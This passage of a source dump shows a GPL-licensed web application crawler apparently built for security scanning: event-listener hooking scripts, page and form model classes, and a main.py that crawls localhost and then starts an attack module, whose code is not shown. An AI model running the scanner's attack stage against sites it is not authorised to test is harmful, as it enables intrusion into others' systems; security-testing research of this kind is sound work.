280 | 			}
281 | 		}
282 | 		for (i = 0; i < selects.length; i++) {
283 | 			s = selects[i];
284 | 			tag = s.tagName
285 | 			id = s.id;
286 | 			html_class = s.className;
287 | 			dom_adress = getXPath(s);
288 | 			function_id = "";
289 | 			resp = {
290 | 				"event" : "change",
291 | 				"function_id" : function_id,
292 | 				"addr" : dom_adress,
293 | 				"id" : id,
294 | 				"tag" : tag,
295 | 				"class" : html_class
296 | 			}
297 | 			resp = JSON.stringify(resp)
298 | 			jswrapper.add_eventListener_to_element(resp)
299 | 		}
300 | 		for (xx = 0; xx < options.length; xx++) {
301 | 			element = options[i]
302 | 			tag = element.tagName
303 | 			id = element.id;
304 | 			html_class = element.className;
305 | 			dom_adress = getXPath(element);
306 | 			function_id = "";
307 | 			resp = {
308 | 				"event" : "change",
309 | 				"function_id" : function_id,
310 | 				"addr" : dom_adress,
311 | 				"id" : id,
312 | 				"tag" : tag,
313 | 				"class" : html_class
314 | 			}
315 | 			resp = JSON.stringify(resp)
316 | 			jswrapper.add_eventListener_to_element(resp)
317 | 		}
318 | 	}
319 |     if (tag == "TABLE" && args[0] == "click"){
320 |         candidates = elem.querySelectorAll("button");
321 |         for( xx = 0; xx < candidates.length; xx++) {
322 |             var element = candidates[xx];
323 |             tag = element.tagName;
324 |             id = element.id;
325 |             html_class = element.className;
326 |             dom_adress = getXPath(element);
327 |             function_id = "";
328 |             resp = {
329 |                 "event": "click",
330 |                 "function_id": function_id,
331 |                 "addr": dom_adress,
332 |                 "id": id,
333 |                 "tag": tag,
334 |                 "class": html_class
335 |             };
336 |             resp = JSON.stringify(resp);
337 |             //console.log("Hello " + resp)
338 |             //console.log(element.click)
339 |             jswrapper.add_eventListener_to_element(resp);
340 |         };
341 |     }
342 | }
343 | 
344 | function bodyAddEventListenerWrapper(elem, args) {
345 | 	tag = "body"
346 | 	dom_adress = "";
347 | 	id = elem.id;
348 | 	html_class = elem.className;
349 | 	function_id = MD5(args[1].toString())
350 | 	dom_adress = "/html/body"
351 | 	resp = {
352 | 		"event" : args[0],
353 | 		"function_id" : function_id,
354 | 		"addr" : dom_adress,
355 | 		"id" : id,
356 | 		"tag" : tag,
357 | 		"class" : html_class
358 | 	}
359 | 	resp = JSON.stringify(resp)
360 | 	jswrapper.add_eventListener_to_element(resp)
361 | 
362 | }
363 | 
364 | 


--------------------------------------------------------------------------------
/crawler/js/property_obs.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *Copyright (C) 2015 Constantin Tschuertz
 3 |  * 
 4 |  * This program is free software: you can redistribute it and/or modify
 5 |  * it under the terms of the GNU General Public License as published by
 6 |  * the Free Software Foundation, either version 3 of the License, or
 7 |  * any later version.
 8 |  *
 9 |  *This program is distributed in the hope that it will be useful,
10 |  * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 |  * GNU General Public License for more details.
13 |  *
14 |  * You should have received a copy of the GNU General Public License
15 |  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 |  */
17 | 
18 | 
19 | function catch_properties(){
20 | var elems = document.getElementsByTagName('*')
21 | // console.log(elems.length + " elems found...")
22 | for (my_counter_i = 0; my_counter_i < elems.length; my_counter_i++) {
23 | 	events = []
24 | 	tag = elems[my_counter_i].tagName
25 | 	dom_address = ""
26 | 	id = elems[my_counter_i].id
27 | 	if (elems[my_counter_i].onclick != null) {
28 | 		events.push({"method": "onclick", "func": elems[my_counter_i].onclick})
29 | 	}
30 | 	if (elems[my_counter_i].onmouseover != null) {
31 | 		events.push({"method": "onmouseover", "func": elems[my_counter_i].onmouseover})
32 | 	}
33 | 	if (elems[my_counter_i].onabort != null) {
34 | 		events.push({"method": "onabort", "func": elems[my_counter_i].onabort})
35 | 	}
36 | 	if (elems[my_counter_i].onblur != null) {
37 | 		events.push({"method": "onblur", "func": elems[my_counter_i].onblur})
38 | 	}
39 | 	if (elems[my_counter_i].onchange != null) {
40 | 		events.push({"method": "onchange", "func": elems[my_counter_i].onchange})
41 | 	}
42 | 	if (elems[my_counter_i].onblclick != null) {
43 | 		events.push({"method": "onblclick", "func": elems[my_counter_i].onblclick})
44 | 	}
45 | 	if (elems[my_counter_i].onerror != null) {
46 | 		events.push({"method": "onerror", "func": elems[my_counter_i].onerror})
47 | 	}
48 | 	if (elems[my_counter_i].onfocus != null) {
49 | 		events.push({"method": "onfocus", "func": elems[my_counter_i].onfocus})
50 | 	}
51 | 	if (elems[my_counter_i].onkeydown != null) {
52 | 		events.push({"method": "onkeydown", "func": elems[my_counter_i].onkeydown})
53 | 	}
54 | 	if (elems[my_counter_i].onkeypress != null) {
55 | 		events.push({"method": "onkeypress", "func": elems[my_counter_i].onkeypress})
56 | 	}
57 | 	if (elems[my_counter_i].onkeyup != null) {
58 | 		events.push({"method": "onkeyup", "func": elems[my_counter_i].onkeyup})
59 | 	}
60 | 	if (elems[my_counter_i].onmousedown != null) {
61 | 		events.push({"method": "onmousedown", "func": elems[my_counter_i].onmousedown})
62 | 	}
63 | 	if (elems[my_counter_i].onmousemove != null) {
64 | 		events.push({"method": "onmousemove", "func": elems[my_counter_i].onmousemove})
65 | 	}
66 | 	if (elems[my_counter_i].onmouseout != null) {
67 | 		events.push({"method": "onmouseout", "func": elems[my_counter_i].onmouseout})
68 | 	}
69 | 	if (elems[my_counter_i].onmouseup != null) {
70 | 		events.push({"method": "onmouseup", "func": elems[my_counter_i].onmouseup})
71 | 	}
72 | 	//console.log("We have: " + events.length + " events");
73 | 	if (events.length > 0) {
74 | 		elem = elems[my_counter_i]
75 | 		dom_adress = getXPath(elem);
76 | 		html_class = elems[my_counter_i].className;
77 | 		for (my_counter_j = 0; my_counter_j < events.length; my_counter_j++) {
78 | 			function_id = MD5(events[my_counter_j].func.toString())
79 | 			f = events[my_counter_j].func.toString()
80 | 			e = events[my_counter_j].event_type
81 | 			//clickable = JSON.parse(events[j])
82 | 			tut1 = events[my_counter_j];
83 | 			resp = {
84 | 				"function_id" : function_id,
85 | 				"event" : events[my_counter_j].method,
86 | 				"id" : id,
87 | 				"tag" : tag,
88 | 				"addr" : dom_adress,
89 | 				"class" : html_class
90 | 			}
91 | 			resp = JSON.stringify(resp);
92 | 			jswrapper.add_eventlistener_to_element(resp)
93 | 		}
94 | 	}
95 | 
96 | }
97 | }
98 | 
99 | catch_properties();


--------------------------------------------------------------------------------
/crawler/js/timing_wrapper.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  *Copyright (C) 2015 Constantin Tschuertz
 3 |  * 
 4 |  * This program is free software: you can redistribute it and/or modify
 5 |  * it under the terms of the GNU General Public License as published by
 6 |  * the Free Software Foundation, either version 3 of the License, or
 7 |  * any later version.
 8 |  *
 9 |  *This program is distributed in the hope that it will be useful,
10 |  * but WITHOUT ANY WARRANTY; without even the implied warranty of
11 |  * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 |  * GNU General Public License for more details.
13 |  *
14 |  * You should have received a copy of the GNU General Public License
15 |  * along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 |  */
17 | 
18 | 
19 | // This JS-Script wrapps the addEventListener-Function, that is used by JQuery
20 | timingCallbackWrap(window, "setTimeout", 0, timeoutWrapper);
21 | timingCallbackWrap(window, "setInterval", 0, intervallWrapper);


--------------------------------------------------------------------------------
/crawler/main.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | 
19 | import logging
20 | 
21 | from attacker import Attacker
22 | from crawler import Crawler
23 | from database.databasemanager import DatabaseManager
24 | from utils.config import CrawlConfig, AttackConfig
25 | from models.utils import CrawlSpeed
26 | from utils.user import User
27 | import csv
28 | from utils.utils import calculate_similarity_between_pages
29 | 
30 | # Here you can specify the logging. Now it logs to the console. If you uncomment the two lines below, then it logs in the file.
31 | logging.basicConfig(level=logging.DEBUG,
32 |                     format='%(asctime)s: %(levelname)s - %(message)s',
33 |                     #filename='Attack.log',
34 |                     #filemode='w'
35 |                     )
36 | 
37 | if __name__ == '__main__':
38 | 
39 | 
40 |     # In the Userobject, the first string you set is the name of the crawl run and also the name of the created database.
41 |     # So if you want to keep old runs then just give different names for each crawl
42 | 
43 | 
44 |     # The first of the line below, starts a scan with a logged in user.
45 |     # Parameter desc: Name of DB - Privilege level: deprecated(Just let it 0) - URL where the login form is stored - login data as dict. The key is the parameter name in the login form that has to be set -
46 |     # session: reflects the session within a DB. It is deprecated. Just set it to ABC
47 |     #user = User("WordpressX", 0, "http://localhost:8080/wp-login.php", login_data = {"log": "admin", "pwd": "admin"}, session="ABC")
48 | 
49 | 
50 |     # Crawl without user session. Parameter desc: Name of DB - Privilege level - session
51 |     user = User("Test", 0, session="ABC")
52 | 
53 |     url = "http://localhost/"
54 |     # Creates the crawler config: URL: start url of the crawler(independent from login) - max_dept: how deep to crawl(link), max_click_depth: how deep to follow events - Crawlspeed: Fast is the best value here
55 |     crawler_config = CrawlConfig("Some Name, doesn't matter", url, max_depth=1, max_click_depth=2, crawl_speed=CrawlSpeed.Fast)
56 | 
57 |     # From here you have nothing to chance. Except you want no attacking, then comment out the lines down
58 |     logging.info("Crawler started...")
59 |     database_manager = DatabaseManager(user, dropping=True)
60 |     crawler = Crawler(crawl_config=crawler_config, database_manager=database_manager)#, proxy="localhost", port=8082)
61 |     crawler.crawl(user)
62 |     logging.info("Crawler finished")
63 | 
64 |     # If you want no attacking comment out the lines below.
65 |     logging.info("Start attacking...")
66 |     attack_config = AttackConfig(url)
67 |     attacker = Attacker(attack_config, database_manager=database_manager)#, proxy="localhost", port=8082)
68 |     attacker.attack(user)
69 |     logging.info("Finish attacking...")


--------------------------------------------------------------------------------
/crawler/models/__init__.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''


--------------------------------------------------------------------------------
/crawler/models/ajaxrequest.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import hashlib
19 | from models.asyncrequests import AsyncRequests
20 | 
21 | 
22 | class AjaxRequest(AsyncRequests):
23 |     '''
24 |     Models an Ajax-Request issued by an event
25 |     '''
26 |     def __init__(self, method, url, trigger, parameters=None):
27 |         super(AjaxRequest, self).__init__(method, url, parameters)
28 |         self.trigger = trigger
29 | 
30 |     def toString(self):
31 |         msg =  "[Ajax - Methode: " + self.method + " - Url: "+ self.url.toString() + " - Trigger: " + self.trigger.toString() + " \n"
32 |         for param_pair in self.parameters if self.parameters is not None else []:
33 |             msg += " - Parameter pair: " + str(param_pair)
34 |         return msg
35 | 
36 |     def __eq__(self, other):
37 |         if not isinstance(other, self.__class__):
38 |             return False
39 |         try:
40 |             url = self.url.complete_url
41 |         except AttributeError:
42 |             url = self.url
43 |         try:
44 |             o_url = other.url.complete_url
45 |         except AttributeError:
46 |             o_url = other.url
47 | 
48 |         return self.method == other.method and url == o_url and self.trigger == other.trigger
49 | 
50 |     def __neg__(self):
51 |         return not  self.__eq__()
52 | 
53 | 


--------------------------------------------------------------------------------
/crawler/models/asyncrequests.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | 
19 | import hashlib
20 | class AsyncRequests():
21 | 
22 |     def __init__(self, method, url, parameters=None):
23 |         self.method = method
24 |         self.url = url
25 |         self.request_structure = None
26 |         self.structure = None
27 | 
28 |         self.parameters = parameters
29 |         if not isinstance(self.parameters, dict) and self.parameters is not None:
30 |             self.handle_parameters()
31 | 
32 |     @property
33 |     def request_hash(self):
34 |         try:
35 |             return self.get_hash()
36 |         except AttributeError:
37 |             raise AttributeError("You need first to analyze url")
38 | 
39 | 
40 |     def handle_parameters(self):
41 |         try:
42 |             key_value_pairs = self.parameters.split("&")
43 |             tmp = {}
44 |             for key_value_pair in key_value_pairs:
45 |                 try:
46 |                     key, value = key_value_pair.split("=")
47 |                 except ValueError:
48 |                     continue
49 |                 tmp[key] = value
50 |             tmp = sorted(tmp.items())
51 |             self.parameters = {}
52 |             for key, val in tmp:
53 |                 self.parameters[key] = val
54 |         except AttributeError:
55 |             self.parameters = None
56 | 
57 |     def get_hash(self):
58 |         s_to_hash = self.url.abstract_url + "+" + self.method
59 |         try:
60 |             for k in [x[0] for x in self.parameters]:
61 |                 s_to_hash += "++" + k
62 |         except TypeError:
63 |             pass
64 |         b_to_hash = s_to_hash.encode("utf-8")
65 |         d = hashlib.md5()
66 |         d.update(b_to_hash)
67 |         return d.hexdigest()


--------------------------------------------------------------------------------
/crawler/models/asyncrequeststructure.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | class AsyncRequestStructure():
19 | 
20 |     def __init__(self, structure_hash, parameters= None):
21 |         self.structure_hash = structure_hash
22 |         self.parameters = parameters


--------------------------------------------------------------------------------
/crawler/models/clickable.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | import hashlib
19 | from models.clickabletype import ClickableType
20 | 
21 | 
22 | class Clickable():
23 |     '''
24 |     Models interesting element with events as attributes
25 |     '''
26 |     
27 |     def __init__(self, event, tag, dom_address, id = None, html_class = None, clickable_depth = None, function_id = None):
28 |         self.event = event
29 |         self.tag = tag
30 |         self.dom_address = dom_address
31 |         self.id = id
32 |         self.html_class = html_class
33 |         self.links_to = None
34 |         self.clicked = False
35 |         self.clickable_type = None
36 |         self.clickable_depth = clickable_depth
37 |         self.function_id = function_id    
38 |         
39 |     def toString(self):
40 |         msg = ""
41 |         msg += "[TAG: " + self.tag
42 |         if self.id is not None and not self.id == "":
43 |             msg += " - ID: " + self.id
44 |         if self.event is not None and not self.event == "":
45 |             msg += " - Event: " + self.event
46 |         if self.html_class is not None and not self.html_class == "":
47 |             msg += " - Class: " + self.html_class
48 |         msg += " - Domaddress: " + self.dom_address
49 |         if self.links_to is not None:
50 |             msg += " - Links to: " + self.links_to
51 |         if self.clickable_depth is not None:
52 |             msg += " - Clickable Depth: " + str(self.clickable_depth)
53 |         if self.function_id is not None:
54 |             msg += " - FunctionID: " + self.function_id
55 |         if self.clickable_type is not None:
56 |             if self.clickable_type == ClickableType.CreatesNewNavigatables:
57 |                 msg += " - ClickableType: CreateNewNavigatable"
58 |             elif self.clickable_type == ClickableType.Link:
59 |                 msg += " - ClickableType: Link"
60 |             elif self.clickable_type == ClickableType.SendingAjax:
61 |                 msg += " - ClickableType: SendingAjax"
62 |             elif self.clickable_type == ClickableType.UIChange:
63 |                 msg += " - ClickableType: UiChange"
64 |             elif self.clickable_type == ClickableType.Error:
65 |                 msg += " - ClickableType: Error"
66 |             elif self.clickable_type == ClickableType.IgnoredByCrawler:
67 |                 msg += " - ClickableType: IgnoredByCrawler"
68 |             elif self.clickable_type == ClickableType.UnsupportedEvent:
69 |                 msg += " - ClickableType: UnsupportedEvent"
70 |             else:
71 |                 msg += " - ClickableType: Unknown"
72 |         msg += "]"  
73 |         return msg
74 |     
75 |     def __eq__(self, other):
76 |         if not isinstance(other, self.__class__):
77 |             return False
78 |         if self.clickable_type is not None and other.clickable_type is not None:
79 |             return self.dom_address == other.dom_address and self.event == other.event and self.clickable_type == other.clickable_type and self.links_to == other.links_to
80 |         else:
81 |             return self.dom_address == other.dom_address and self.event == other.event and self.links_to == other.links_to
82 | 
83 |     def __hash__(self):
84 |         s_to_hash = self.toString()
85 |         return hash(s_to_hash)
86 | 
87 | 
88 |     def __ne__(self, other):
89 |         return not self.__eq__(other)        
90 |     
91 |     def similar(self, other):
92 |         if not isinstance(other, self.__class__):
93 |             return False
94 |         if self == other:
95 |             return True
96 |         elif self.html_class == other and self.id == other.id and self.event == other.event and levenshtein < 4:
97 |             return True
98 |         else: 
99 |             return False


--------------------------------------------------------------------------------
/crawler/models/clickabletype.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from enum import Enum
19 | 
20 | class ClickableType(Enum):
21 |     UIChange = 0
22 |     Link = 1
23 |     CreatesNewNavigatables = 2
24 |     Error = 3
25 |     SendingAjax = 4
26 |     IgnoredByCrawler = 5
27 |     UnsupportedEvent = 6
28 |     CreateNewWindow = 7


--------------------------------------------------------------------------------
/crawler/models/deltapage.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | 
19 | from models.webpage import WebPage
20 | 
21 | class DeltaPage(WebPage):
22 |     
23 |     def __init__(self, id, url = None, html = None, cookiesjar = None, depth = None, generator = None, parent_id = None, delta_depth = None, base_url = None):
24 |         WebPage.__init__(self, id, url, html, cookiesjar, depth, base_url=base_url)
25 |         self.generator = generator
26 |         self.generator_requests = []
27 |         self.parent_id = parent_id
28 |         self.delta_depth = delta_depth
29 |         
30 |     def toString(self):
31 |         msg = "[ Page: " + str(self.url) + " - ID: " + str(self.id) + " - Depth:" + str(self.current_depth) +" \n"
32 |         msg += "Parent-ID: " + str(self.parent_id) + " - Generator: " + self.generator.toString() + " - Delta Depth: " + str(self.delta_depth) + " \n"
33 |         if len(self.generator_requests) > 0:
34 |             msg += "Generator AsyncRequests: \n"
35 |             for r in self.generator_requests:
36 |                 msg += " - " + r.toString() + " \n"
37 |         if len(self.clickables) > 0: 
38 |             msg += "Clickable: \n"
39 |             for elem in self.clickables:
40 |                 msg += elem.toString() + " \n"
41 |         if len(self.timing_requests) > 0:
42 |             msg += "Timingrequests: \n"
43 |             for elem in self.timing_requests:
44 |                 msg += elem.toString() + " \n"
45 |         if len(self.links) > 0: 
46 |             msg += "Static Links: \n"
47 |             for link in self.links:
48 |                 tmp = link.toString()
49 |                 msg += tmp + " \n"
50 |         if len(self.forms) > 0: 
51 |             msg += "Forms: \n"
52 |             for elem in self.forms:
53 |                 msg += elem.toString() + " \n"
54 |         return msg + "]"    
55 |     
56 | 
57 | 


--------------------------------------------------------------------------------
/crawler/models/enumerations.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | from enum import Enum
18 | 
19 | class XHRBehavior(Enum):
20 |     IgnoreXHR = 0
21 |     ObserveXHR = 1
22 |     InterceptXHR = 2
23 | 


--------------------------------------------------------------------------------
/crawler/models/form.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | 
19 | import hashlib
20 | 
21 | 
22 | class HtmlForm():
23 |     def __init__(self, parameters, action, method, dom_address=None):
24 |         self.parameter = parameters  # Array of FormInput's
25 |         self.parameter = sorted(self.parameter, key=lambda parameter: parameter.name if parameter.name is not None else "")
26 |         self.action = action
27 |         self.method = method
28 |         self.dom_address = dom_address
29 | 
30 |     @property
31 |     def form_hash(self):
32 |         return self.get_hash()
33 | 
34 |     def toString(self):
35 |         msg = "[Form: Action: '" + self.action.abstract_url + "' Method:' " + self.method + " - Formhash: " + self.get_hash() + " \n"
36 |         if self.dom_address is not None:
37 |             msg += "Dom Address: " + self.dom_address + " \n"
38 |         for elem in self.parameter:
39 |             msg += "[Param: " + str(elem.tag) + " Name: " + str(elem.name) + " Inputtype: " + str(
40 |                 elem.input_type) + " Values: " + str(elem.values) + "] \n"
41 |         return msg + "]"
42 | 
43 |     def hasSubmit(self):
44 |         return self.submit != None
45 | 
46 |     def __eq__(self, other):
47 |         if not isinstance(other, self.__class__):
48 |             return False
49 |         return self.get_hash() == other.get_hash()
50 | 
51 |     def __ne__(self, other):
52 |         return not self.__eq__(other)
53 | 
54 |     def get_hash(self):
55 |         s_to_hash = self.action.abstract_url + ";" + self.method + ";"
56 |         for p in self.parameter:
57 |             s_to_hash += str(p.name) + ";" + p.tag + ";" + str(p.input_type) + ";"
58 |         b_to_hash = s_to_hash.encode("utf-8")
59 |         d = hashlib.md5()
60 |         d.update(b_to_hash)
61 |         return d.hexdigest()
62 | 
63 | 
64 | class FormInput():
65 |     def __init__(self, tag, name, input_type="", values=None):
66 |         self.tag = tag
67 |         self.name = name
68 |         self.values = values
69 |         self.input_type = input_type
70 | 
71 |     def __eq__(self, other):
72 |         if not isinstance(other, self.__class__):
73 |             return False
74 |         if self.values is not None:
75 |             for val in self.values:
76 |                 if other.values is None or not val in other.values:
77 |                     return False
78 |         return self.tag == other.tag and self.name == other.name and self.input_type == other.input_type
79 | 
80 |     def __ne__(self, other):
81 |         return not self.__eq__(other)
82 | 
83 |     def toString(self):
84 |         return "[Param: " + str(self.tag) + " Name: " + str(self.name) + " Inputtype: " + str(
85 |                 self.input_type) + " Values: " + str(self.values) + "] \n"
86 | 
87 | 
88 | class InputField():
89 |     def __init__(self, input_type, html_id=None, html_class=None, value=None):
90 |         self.input_type = input_type
91 |         self.html_id = html_id
92 |         self.html_class = html_class
93 |         self.value = value  # Predifiend value, if available...
94 | 


--------------------------------------------------------------------------------
/crawler/models/keyclickable.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 | 
18 | from models.clickable import Clickable
19 | from models.clickabletype import ClickableType
20 | 
21 | class KeyClickable(Clickable):
22 |     
23 |     def __init__(self, clickable, key_event):
24 |         Clickable.__init__(self, clickable.event, clickable.tag, clickable.dom_address, clickable.id, clickable.html_class, clickable.clickable_depth, clickable.function_id)
25 |         self.random_char = key_event #Is the key typed in for triggering the clickabel
26 |     
27 |     def toString(self):   
28 |         msg = ""
29 |         msg += "[TAG: " + self.tag
30 |         if self.id is not None and not self.id == "":
31 |             msg += " - ID: " + self.id
32 |         if self.event is not None and not self.event == "":
33 |             msg += " - Event: " + self.event
34 |         if self.html_class is not None and not self.html_class == "":
35 |             msg += " - Class: " + self.html_class
36 |         msg += " - Domadress: " + self.dom_address
37 |         if self.links_to is not None:
38 |             msg += " - Links to: " + self.links_to
39 |         if self.clickable_depth is not None:
40 |             msg += " - Clickable Depth: " + str(self.clickable_depth)
41 |         if self.function_id is not None:
42 |             msg += " - FunctionID: " + self.function_id
43 |         if self.clickable_type is not None:
44 |             if self.clickable_type == ClickableType.CreatesNewNavigatables:
45 |                 msg += " - ClickableType: Create_new_navigatable"
46 |             elif self.clickable_type == ClickableType.Link:
47 |                 msg += " - ClickableType: Link"
48 |             elif self.clickable_type == ClickableType.SendingAjax:
49 |                 msg += " - ClickableType: SendingAjax"
50 |             elif self.clickable_type == ClickableType.UIChange:
51 |                 msg += " - ClickableType: UiChange"
52 |             elif self.clickable_type == ClickableType.Error:
53 |                 msg += " - ClickableType: Error"
54 |         if self.random_char is not None:
55 |             msg += self.random_char
56 |         msg += "]"  
57 |         return msg


--------------------------------------------------------------------------------
/crawler/models/link.py:
--------------------------------------------------------------------------------
 1 | '''
 2 | Copyright (C) 2015 Constantin Tschuertz
 3 | 
 4 | This program is free software: you can redistribute it and/or modify
 5 | it under the terms of the GNU General Public License as published by
 6 | the Free Software Foundation, either version 3 of the License, or
 7 | any later version.
 8 | 
 9 | This program is distributed in the hope that it will be useful,
10 | but WITHOUT ANY WARRANTY; without even the implied warranty of
11 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
12 | GNU General Public License for more details.
13 | 
14 | You should have received a copy of the GNU General Public License
15 | along with this program.  If not, see <http://www.gnu.org/licenses/>.
16 | '''
17 |   
18 | class Link():
19 |     
20 |     def __init__(self, url, dom_address, html_id = "", html_class = ""):
21 |         self.url = url 
22 |         self.dom_address = dom_address
23 |         self.html_id = html_id
24 |         self.html_class = html_class
25 |         
26 |     def toString(self):
27 |         res = "["
28 |         res += "A-HREF: " + self.url.abstract_url + " - {}".format(self.url.url_hash)
29 |         res += " - Domadress: " + self.dom_address
30 |         if self.html_id != "":
31 |             res += " - ID: " + self.html_id
32 |         if self.html_class != "":
33 |             res += " - Class: " + self.html_class
34 |         res += "]"
35 |         return res
36 |     
37 |     def __eq__(self, other):
38 |         if not isinstance(other, self.__class__):
39 |             return False
40 |         return self.url == other.url
41 | 
42 |     def __ne__(self, other):
43 |         return not self.__eq__(other) 
